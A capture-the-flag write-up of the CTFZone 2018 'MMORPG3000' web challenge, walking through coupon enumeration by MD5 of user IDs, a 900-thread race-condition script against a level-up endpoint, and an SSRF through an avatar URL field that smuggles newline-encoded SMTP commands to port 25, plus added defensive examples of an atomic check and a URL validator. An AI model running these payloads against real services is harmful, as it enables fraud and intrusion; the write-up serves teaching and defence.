# MMORPG3000  
```  
Here is a new generation mmorpg game, where you can beat your friends, just
finished crowdfunding campaign and available on your PC starting today. It's a
bit buggy, but you know...  
I heard that developers of this game are really greedy.

http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/game/battle/competitors/  
```

We opened the link, and after registering we were shown this page.

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/1.png)

We went to the __donate__ page to claim our free coupon.

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/2.png)

We entered our coupon and were shown an image like this:

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/3.png)

The __URL__ of the image was as follows:

```  
http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/storage/img/coupon_aa2a77371374094fe9e0bc1de3f94ed9.png  
```

We noticed that the hash in __coupon_aa2a77371374094fe9e0bc1de3f94ed9__ was the
hashed form of the userid. We hashed another number and tried it.

We took the __MD5__ of __1682__ and tried it: __6a81681a7af700c6385d36577ebec359__

```  
http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/storage/img/coupon_6a81681a7af700c6385d36577ebec359.png  
```

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/4.png)

The result was __b92ee610-4289__; we tried the coupon and it gave 1 balance. We
tried a few more coupons and ended up with 1349 coupons.

We leveled up with money, but learned that money cannot take you past level
30. Thinking there might be a __Race Condition__, we sent the same request from
many threads using another account.

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/5.png)

```python  
import requests
import threading

threadArray = []


class expClass(threading.Thread):
    # Request exported from Burp: the paid level-up endpoint.
    burp0_url = "http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one:80/donate/lvlup"
    burp0_cookies = {"session": "eyJ1aWQiOjgyOX0.DjeKvA.qA-vNIHjDFSPyuDwArZyGMQD984"}
    burp0_headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-GB,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Referer": "http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/user/info",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
    }

    def __init__(self, numMain):
        super(expClass, self).__init__()

    def ham(self):
        # Send a single level-up request.
        requests.get(self.burp0_url, headers=self.burp0_headers,
                     cookies=self.burp0_cookies)

    def run(self):
        self.ham()


thr = 900

# Create every thread first so they can be started as close together as possible.
for i in range(0, thr):
    threadcan = expClass(i)
    threadArray.append(threadcan)

for i in range(0, thr):
    threadArray[i].start()
    print("thread girdi => " + str(i))
for i in range(0, thr):
    threadArray[i].join()
    print("thread cikti => " + str(i))
```

And we got past level 30.

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/6.png)
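Why parallel requests get past a cap that sequential requests respect, as an added example rather than the game's server code (which the page does not show). The `Account` class, both handlers and the barrier that forces the interleaving are constructed for illustration.

```python
import threading

LEVEL_CAP = 30  # the page says money cannot take a character past level 30


class Account:
    def __init__(self, level):
        self.level = level
        self.lock = threading.Lock()


def lvlup_racy(acct, gate):
    # Check-then-act: the cap is read first and the write happens later.
    allowed = acct.level < LEVEL_CAP
    gate.wait()  # constructed: every request finishes its check before any write
    if allowed:
        with acct.lock:  # locking only the write is useless, the decision is stale
            acct.level += 1


def lvlup_atomic(acct, gate):
    gate.wait()
    with acct.lock:  # check and write form one critical section
        if acct.level < LEVEL_CAP:
            acct.level += 1


def simulate(handler, start_level=29, requests=20):
    """Fire `requests` concurrent level-ups and return the final level."""
    acct = Account(start_level)
    gate = threading.Barrier(requests)
    workers = [threading.Thread(target=handler, args=(acct, gate))
               for _ in range(requests)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return acct.level


if __name__ == "__main__":
    print("racy  :", simulate(lvlup_racy))
    print("atomic:", simulate(lvlup_atomic))
```

In a database-backed service the same fix is a single conditional statement such as `UPDATE ... SET level = level + 1 WHERE id = ? AND level < 30`, or a row lock held across the check and the write.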

Because we had passed level 30, the __Avatar__ upload feature was unlocked.

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/7.png)

There was nothing exploitable in the upload itself, so we suspected __SSRF__.
__127.0.0.1__ and __localhost__ were blocked, which made us sure it was
__SSRF__. We tried the address __0.0.0.0__ and noticed that it was accepted.
We started port scanning.

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/8.png)

Port __25__, the __SMTP__ port, was open. We tried to use __SMTP__ by
manipulating the __Host__.

```smtp  
Host: [0.0.0.0  
helo 1v3m  
mail from:<[email protected]>  
rcpt to:<root>  
data  
subject: give me flag

1v3m  
.  
]:25  
```

Because the newline is the delimiter in __SMTP__, we appended __%0A__, the
__URL Encoded__ form of a newline, to the end of every line. The final form of
our payload was:

```url  
[0.0.0.0%0ahelo 1v3m%0amail from:<[email protected]>%0arcpt to:<root>%0adata%0asubject: give me flag%0a%0a1v3m%0a.%0a]:25
```

The final form of our __Request__ was:

```http  
POST /user/avatar HTTP/1.1
Host: web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/user/avatar
Content-Type: multipart/form-data; boundary=---------------------------4693211868403427471435307016
Content-Length: 581
Cookie: session=eyJ1aWQiOjgyN30.DjaSgA.ylhJXkstamQ7GahYWvUypKpvDQc
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------4693211868403427471435307016
Content-Disposition: form-data; name="avatar"; filename=""
Content-Type: application/octet-stream

-----------------------------4693211868403427471435307016
Content-Disposition: form-data; name="url"

https://[0.0.0.0%0ahelo 1v3m%0amail from:<[email protected]>%0arcpt to:<root>%0adata%0asubject: give me flag%0a%0a1v3m%0a.%0a]:25
-----------------------------4693211868403427471435307016
Content-Disposition: form-data; name="action"

save
-----------------------------4693211868403427471435307016--

```

The flag arrived in our mailbox.

![](https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/9.png)

And the flag:

```  
ctfzone{1640392aaf27597150c97e04a99a6f08}  
```
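A stricter check for the avatar `url` field than a string blocklist of `127.0.0.1` and `localhost`, as an added example (not code from the challenge or the original writeup). The function names, the allowed schemes and ports, and the sample hosts in the usage are assumptions.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

DEFAULT_PORT = {"http": 80, "https": 443}   # assumed policy: web schemes, default ports only
HOSTNAME = re.compile(r"^[a-z0-9]([a-z0-9.-]*[a-z0-9])?$")


def dns_lookup(host):
    """Default resolver: every address the name currently maps to."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def vet_avatar_url(url, resolve=dns_lookup):
    """Return the vetted IPs for url, or raise ValueError."""
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in url):
        raise ValueError("whitespace or control character in URL")
    parts = urlsplit(url)                    # may raise ValueError on a malformed [..] host
    default = DEFAULT_PORT.get(parts.scheme)
    if default is None or (parts.port is not None and parts.port != default):
        raise ValueError("scheme or port not allowed")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials in URL")
    host = parts.hostname or ""
    try:
        candidates = [str(ipaddress.ip_address(host))]   # IP literal, no DNS needed
    except ValueError:
        if not HOSTNAME.match(host):         # '%', '<', ':' never belong in a host name
            raise ValueError("invalid host")
        candidates = resolve(host)
    if not candidates:
        raise ValueError("host did not resolve")
    for text in candidates:
        ip = ipaddress.ip_address(text)
        ip = getattr(ip, "ipv4_mapped", None) or ip      # unwrap ::ffff:a.b.c.d
        if (ip.is_unspecified or ip.is_loopback or ip.is_private
                or ip.is_link_local or ip.is_multicast or ip.is_reserved):
            raise ValueError("address %s is not publicly routable" % ip)
    return candidates


def is_allowed(url, resolve=dns_lookup):
    try:
        vet_avatar_url(url, resolve)
        return True
    except (ValueError, OSError):            # OSError covers DNS failures
        return False
```

The fetcher has to connect to one of the returned addresses and refuse redirects; otherwise a second DNS lookup or a redirect can land on an address that was never vetted.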

Original writeup
(https://cybersaxostiger.github.io/2018/07/23/MMORPG3000-CTFZone-2018/).